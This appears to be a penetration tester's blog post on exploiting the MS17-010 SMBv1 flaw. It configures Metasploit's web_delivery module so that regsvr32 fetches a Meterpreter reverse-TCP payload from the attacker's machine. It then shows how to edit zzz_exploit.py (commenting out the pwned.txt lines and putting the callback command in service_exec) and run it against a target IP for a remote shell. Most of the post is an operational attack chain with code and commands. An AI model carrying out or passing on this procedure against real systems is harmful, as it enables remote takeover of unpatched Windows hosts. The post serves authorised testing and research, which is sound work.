MS17-010 is an exploit, supposedly, developed by the NSA. It is an attack against the SMBv1 protocol and was leaked in April 2017 by the Shadow Brokers. A full breakdown of MS17-010 can be found here.
This exploit is commonly found on internal penetration tests and can often lead to SYSTEM level access via Remote Code Execution. Through Metasploit, there are several readily available modules for this:
msf > search ms17 Matching Modules ================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- auxiliary/admin/mssql/mssql_enum_domain_accounts normal No Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli normal No Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration auxiliary/admin/mssql/mssql_enum_sql_logins normal No Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration auxiliary/admin/mssql/mssql_escalate_execute_as normal No Microsoft SQL Server Escalate EXECUTE AS auxiliary/admin/mssql/mssql_escalate_execute_as_sqli normal No Microsoft SQL Server SQLi Escalate Execute AS auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection exploit/windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
With this abundance of modules, there still isn't a consistent module for hitting x86 or obscure version builds. The common complaint from Metasploit is that the target does not match the required arch or build. This can be fixed with the customised Worawit's python script.
For the purpose of testing this set up, it was done on a x64 bit Data Centre build that I KNOW is vulnerable to MS17-010, further development will be put into ensuring that this does infact work on x86. With that said, zzz_exploit.py does however state that it has been tested on all of the following versions:
- Windows 2016 x64 - Windows 10 Pro Build 10240 x64 - Windows 2012 R2 x64 - Windows 8.1 x64 - Windows 2008 R2 SP1 x64 - Windows 7 SP1 x64 - Windows 2008 SP1 x64 - Windows 2003 R2 SP2 x64 - Windows XP SP2 x64 - Windows 8.1 x86 - Windows 7 SP1 x86 - Windows 2008 SP1 x86 - Windows 2003 SP2 x86 - Windows XP SP3 x86 - Windows 2000 SP4 x86
Worawit put out a GitHub repository full of proof-of-concept code and useful scripts. The note worthy ones are checker.py and zzz_exploit.py. zzz_exploit.py is the script that will be modified slightly to enable more manual exploitation of MS17-010 and should allow for the exploitation of the previously mentioned Windows variants.
All credit goes to Korey Mckinley and his article, small adjustments were made to this to suit my current set up.
A new technique was introduced to me from Korey, it was the use of regsvr32 to call back to the attacker machine and download a file to create a reverse shell. The module for this is called web_delivery.
This is easy enough to configure. In Metasploit, use the
exploit/multi/script/web_delivery module and configure the options accordingly.
This module has multiple methods for calling back to the attacker machine. However, this post will stick to regsvr32.
My Metasploit configuration looked like this:
set target 3 is set if using regsvr32. What this module is doing is using the target method (regsvr32) to call back to the attackers machine and download the payload specified. In this case,
windows/x64/meterpreter/reverse_tcp is being used.
Once this module is ran, it will generate a command that can be ran on a target machine and create the callback. For testing, it might be worth manually copying and pasting this command into your test VM and watch Metasploit to ensure that the regsvr32 command is working. Once this is done, and youre happy that it is working; this command needs to be added to
The command created:
Clone Worawit's GitHub. Make any permission changes and open up
zzz_exploit.py. Line 972 is the creation of the
The first few lines of this function will create a
pwned.txt on the
C:\. This isnt required, so comment out the following:
print('creating file c:\\pwned.txt on the target') tid2 = smbConn.connectTree('C$') fid2 = smbConn.createFile(tid2, '/pwned.txt') smbConn.closeFile(tid2, fid2) smbConn.disconnectTree(tid2)
Underneath that, there will be an example use of
service_exec function. Uncomment this and switch out the payload for the payload generated by
web_delivery. The function should now look similar to this:
The function has now been updated to contain the regsvr32 command. Execute the script against the specified host with
python zzz_exploit.py 192.168.0.35.
Once executed, you should see something similar to this:
The module shows
regsvr32 calling back and collecting the payload and the meterpreter session being created.
And thats how you use
regsvr32 as a means to create a reverse shell from a MS17-010 python script. The purpose of this is to allow further research into exploiting more obscure versions of Windows and that is exactly what will happen in the near future for myself. I am fairly certain this will work on x86 machines, but I will create another post confirming or denying this.
My modified fork can be found here.